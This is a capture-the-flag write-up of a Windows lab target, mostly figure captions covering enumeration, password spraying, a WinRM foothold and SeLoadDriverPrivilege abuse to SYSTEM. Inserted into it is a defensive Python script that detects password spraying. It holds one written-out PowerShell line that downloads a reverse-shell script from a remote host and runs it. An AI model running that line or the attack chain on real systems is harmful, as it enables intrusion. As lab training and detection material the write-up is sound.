
Target Experience:

My observations while working this target:

Tools:

The recommended tools for this lab were:

Vulnerabilities:

· Exposed Username(s)

Information Gathering:

Using Nmap, I scanned the target with service version detection, OS detection, script scanning and verbose output enabled, saving the results to a file.

Figure 1: Nmap Scan
Figure 2: CrackMapExec SMB Enumeration
Figure 3: CME LDAP Enumeration
Figure 4: Failed LDAP Enumeration
Figure 5: Default Web Page
Figure 6: Exposed Usernames

Foothold:

After gathering the usernames, I decided to password spray the target, even though I had not been able to obtain the password lockout policy.

Figure 7: Original Password List
Figure 8: For Loop & Hashcat
Figure 9: Snip of Final Password List
Figure 10: Spraying Results
Figure 11: SMB & WinRM Results
Figure 12: smbpasswd & rpcclient
Figure 13: Failed Logon
Figure 14: script.sh & auth.in
Figure 15: Cleartext Password — RPCClient (enumprinters)
Figure 16: Password Spraying
Figure 17: Validated WinRM Access
Figure 18: User Shell (svc-print)
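The spraying above stays under any per-account lockout threshold by trying one or two passwords against many accounts, which is exactly what a per-account failure counter will miss. As an added defender-side illustration (not part of the original write-up), the Python below groups Windows 4625 failed-logon records by source address and flags a source that touches many distinct accounts inside a time window; the log records and usernames are constructed for the example.

```python
"""Password-spray detection over Windows Security event 4625 (failed logon) records.

Counts distinct target accounts per source address inside a sliding window,
because a spray keeps failures per account below the lockout threshold.
Records below are constructed for this example, not taken from a real host.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: <timestamp> <EventID> TargetUserName=<user> IpAddress=<src>
SAMPLE_EVENTS = [
    "2020-06-20T10:00:01 4625 TargetUserName=user01 IpAddress=10.10.14.5",
    "2020-06-20T10:00:03 4625 TargetUserName=user02 IpAddress=10.10.14.5",
    "2020-06-20T10:00:05 4625 TargetUserName=user03 IpAddress=10.10.14.5",
    "2020-06-20T10:00:07 4625 TargetUserName=user04 IpAddress=10.10.14.5",
    "2020-06-20T10:00:09 4625 TargetUserName=Administrator IpAddress=10.10.14.5",
    "2020-06-20T10:00:11 4625 TargetUserName=svc-print IpAddress=10.10.14.5",
    "2020-06-20T10:01:01 4625 TargetUserName=user01 IpAddress=10.10.14.5",
    "2020-06-20T10:01:03 4625 TargetUserName=user02 IpAddress=10.10.14.5",
    # A legitimate user mistyping a password three times from their own workstation.
    "2020-06-20T10:05:00 4625 TargetUserName=jsmith IpAddress=10.10.10.50",
    "2020-06-20T10:05:10 4625 TargetUserName=jsmith IpAddress=10.10.10.50",
    "2020-06-20T10:05:20 4625 TargetUserName=jsmith IpAddress=10.10.10.50",
    "2020-06-20T10:05:30 4624 TargetUserName=jsmith IpAddress=10.10.10.50",
]

def parse_event(line):
    """Return (time, event_id, user, source_ip) from one record."""
    ts, event_id, rest = line.split(" ", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.fromisoformat(ts), event_id, fields["TargetUserName"].lower(), fields["IpAddress"]

def detect_spray(lines, window=timedelta(minutes=30), min_accounts=5):
    """Return {source_ip: distinct_accounts} for every source whose failed logons
    hit at least min_accounts distinct accounts within any span of `window`."""
    failures = defaultdict(list)
    for line in lines:
        t, eid, user, src = parse_event(line)
        if eid == "4625":
            failures[src].append((t, user))
    alerts = {}
    for src, events in failures.items():
        events.sort()
        start = 0
        for end, (t_end, _) in enumerate(events):
            while t_end - events[start][0] > window:  # slide the window forward
                start += 1
            accounts = {u for _, u in events[start:end + 1]}
            if len(accounts) >= min_accounts:
                alerts[src] = max(alerts.get(src, 0), len(accounts))
    return alerts

def max_failures_per_account(lines, src):
    """Highest failure count any single account saw from `src`; for a spray this
    stays below the lockout threshold, which is why per-account counting misses it."""
    counts = defaultdict(int)
    for line in lines:
        _, eid, user, s = parse_event(line)
        if eid == "4625" and s == src:
            counts[user] += 1
    return max(counts.values(), default=0)

if __name__ == "__main__":
    print(detect_spray(SAMPLE_EVENTS))                           # {'10.10.14.5': 6}
    print(max_failures_per_account(SAMPLE_EVENTS, "10.10.14.5"))  # 2
```

The sprayer never exceeds two failures per account, so a lockout policy alone would not have stopped it; the per-source distinct-account count is what surfaces it.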

Privilege Escalation:

After establishing a foothold, I started to enumerate the target. Interestingly, I had not previously seen SeLoadDriverPrivilege enabled for a service account. So, I performed an Internet-based search for “SeLoadDriverPrivilege abuse” and found a few articles detailing a privilege escalation path.

Figure 19: Privilege to Abuse
Figure 20: EoPLoadDriver.cpp
Figure 21: ExploitCapcom.cpp
powershell.exe iex (iwr http://10.10.15.111/Invoke-RS.ps1 -UseBasicParsing);
Figure 22: Successfully Abused Privilege
Figure 23: Executed Exploit
Figure 24: Priv Esc Shell (SYSTEM)

References:

https://www.youtube.com/watch?v=H9FcE_FMZio&t=730

Disclaimer:

This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.

Cyber Security Enthusiast
